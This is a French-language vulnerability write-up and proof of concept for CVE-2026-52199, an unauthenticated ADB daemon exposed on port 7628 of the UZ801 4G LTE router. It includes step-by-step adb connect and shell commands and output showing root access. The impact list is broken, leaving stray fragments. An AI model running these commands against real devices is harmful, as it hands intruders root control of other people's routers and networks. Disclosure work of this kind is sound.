
Exploit de preuve de concept pour CVE-2026-52199 : exécution de code à distance non authentifiée via le démon ADB exposé sur le routeur 4G LTE UZ801. Comprend l'analyse de la vulnérabilité, l'évaluation de l'impact et un guide d'exploitation étape par étape pour les tests de sécurité autorisés.
Une vulnérabilité critique de contrôle d'accès incorrect existe dans le routeur 4G LTE UZ801_v2.1 OEM générique (firmware V3.4.3). L'appareil expose de manière inappropriée un démon Android Debug Bridge (ADB) non authentifié (/sbin/adbd) sur le port TCP 7628 au réseau adjacent (LAN/WiFi).
Un attaquant connecté au réseau local de l'appareil peut exploiter cette faille pour contourner tous les mécanismes d'authentification, établir une connexion ADB et exécuter du code arbitraire avec les privilèges root.

/sbin/adbdL'exploitation de cette vulnérabilité conduit à un compromis complet du système. L'impact inclut :
root)Le processus d'exploitation ne nécessite aucun outil spécial autre que le client adb standard et un accès au réseau adjacent.
Étape 1 : Connectez-vous au réseau WiFi du routeur UZ801 (la passerelle par défaut est généralement 192.168.100.1).
Étape 2 : Scannez l'appareil à la recherche de ports ouverts. Le port 7628/TCP sera signalé comme ouvert.
Étape 3 : Depuis la machine de l'attaquant, initiez une connexion ADB vers le port non documenté :
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628
Étape 4 : Demandez un shell interactif :
$ adb -s 192.168.100.1:7628 shell
Étape 5 : L'attaquant obtient immédiatement un shell root sans aucune invite d'authentification :
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64
Uniquement à des fins éducatives et de recherche en sécurité autorisée.
Les informations et la preuve de concept fournies dans ce dépôt sont destinées uniquement à des fins éducatives et à aider à sécuriser les réseaux. L'auteur (lamaper) n'est pas responsable de toute utilisation abusive de ces informations. N'utilisez pas cet exploit contre des appareils ou des réseaux que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.